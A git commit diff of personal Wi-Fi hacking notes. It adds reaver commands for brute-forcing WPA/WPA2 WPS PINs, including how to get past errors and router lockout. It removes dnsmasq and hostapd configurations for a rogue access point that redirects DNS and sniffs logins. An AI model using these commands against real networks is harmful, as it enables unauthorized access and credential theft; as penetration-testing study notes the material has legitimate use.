2 Commits 4d45b3dc08 ... 02a34264e6

Author SHA1 Message Date
  golem 02a34264e6 added more notes 2 months ago
  golem 4d45b3dc08 added notes 2 months ago
1 changed files with 18 additions and 60 deletions
  1. 18 60
      NetworkHacking.org

+ 18 - 60
NetworkHacking.org

@@ -208,7 +208,7 @@ of the connected clients, instead of the mac address of our network interface:
 
 *** WPA/WPA2
 
-**** Without a wordlist
+**** Without a wordlist (WPS)
 
 To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the
 WPS authentication system, if it's misconfigured.
@@ -228,9 +228,24 @@ and to crack the network, we first need to associate with the network:
 and then, we can bruteforce the WPS pin:
 
 #+BEGIN_SRC bash
-  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv --no-associate
+  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A
 #+END_SRC
 
+***** Bypassing 0x2 and 0x3 errors
+
+In case we get 0x3 and 0x4 errors in reaver, we can add the ~-N~ argument, to
+stop it from sending NACK messages, the end command would be like this:
+
+#+BEGIN_SRC bash
+  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N
+#+END_SRC
+
+***** Bypassing WPS Lock
+
+We exploit WPS by bruteforcing its pin, this means we try every possible pin,
+some routers lock after a number of failed attemps. The solution is to either
+reset the router, or to get the user to reset their router.
+
 **** With a wordlist
 
 First, we need to capture the handshake, to do that, we just need to run
@@ -416,64 +431,7 @@ need to first, flush iptables:
 	iptables -p FORWARD ACCEPT
 #+end_src
 
-We need a dnsmasq configuration file:
-
-#+begin_src text
-	interface=[interface_name]
-	dhcp-range=[ip_range_given_to_clients]
-	dhcp-option=3,[gateway_ip_address]
-	dhcp-option=6,[dns_server_address]
-	address=/#/[address_to_redirect_to]
-#+end_src
-
-For example:
-
-#+begin_src text
-	interface=wlan0
-	dhcp-range=10.0.0.10,10.0.0.100,8h
-	dhcp-option=3,10.0.0.1 # computer ip address
-	dhcp-option=6,10.0.0.1
-	address=/#/10.0.0.1
-#+end_src
-
-And we can run dnsmasq like this:
-
-#+begin_src bash
-	dnsmasq -C [config_file_location]
-#+end_src
-
-And we also need a configuration file for hostapd:
-
-#+begin_src text
-	interface=[interface_name]
-	ssid=[ssid]
-	channel=[channel]
-	driver=[driver]
-#+end_src
-
-For example:
-
-#+begin_src text
-	interface=wlan0
-	ssid=wifi
-	channel=1
-	driver=nl80211
-#+end_src
-
-And we have now to execute hostapd:
-
-#+begin_src bash
-  hostapd [config_file] -B
-#+end_src
-
-When hostapd is running, we must give an IP addres to our interface name, which
-in previous examples was wlan0:
-
-#+begin_src bash
-  ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
-#+end_src
-
-And now, we can sniff the login information with wireshark.
+*** WPA/WPA2 Enterprise
 
 ** Post-Connection Attacks